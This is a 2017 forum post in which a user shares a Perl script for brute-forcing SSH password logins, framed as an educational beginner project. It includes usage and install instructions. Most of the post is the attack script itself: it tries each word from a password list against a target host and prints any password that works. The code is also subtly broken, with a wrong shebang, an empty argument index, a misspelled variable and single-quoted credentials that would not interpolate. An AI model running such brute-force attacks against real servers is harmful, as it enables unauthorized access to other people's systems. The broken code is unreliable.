HomeForumsComputersProgramming

[Scripting] Simple SSH Bruteforce Script in Perl

3 replies [Last post]
26 November, 2017 - 08:56
frey443
frey443's picture
Offline
Neophyte
Joined: 2017/11/19

Hi,

Frey here with a simple script that I've scripted in Perl aimed toward beginners.

This is a simple SSH bruteforce script for user-password authentication. I should note that this won't work if the server uses keys which is more secure and most use now, but this isn't about much about hacking but more about education and learning a new language. Please use this and improve it if you wish.

The code:

#!/bin/sh/perl

use Net::SSH::Expect;

my $username = @ARGV[];
my $password_list = @ARGV[1];
my $host = @ARGV[2];
my $ssh;

#usage: perl ssh_brute.pl username password_list host

open(WORDLIST, "$password_list")
        or die "[!] Failed to open: $password_list";

#read each line of the file
#try it as a password

@wordlist=<WORDLIST>;

foreach $password (@wordlist)
{

        chomp($passwod);
        print "[*]Trying $password \n";
       
        #try the password with user-password authentication
        #build the constructor
        my $ssh = Net::SSH::Expect -> new (
        host => "$host",
        password => '$password',
        user => '$username',
        raw_pty => 1
        );
       
        if($ssh -> login())
        {

                print "[*]$password is the password to $host.";
                $ssh -> close();
                die;

        }

}
die "[!] Password was not found.";

To run it, simply type: perl ssh_brute.pl username password_list host

If you get a error that Net::SSH::Expect is missing, please run:

cpan

Than:

install Net::SSH::Expect

And this should install the required library.

-Frey

Top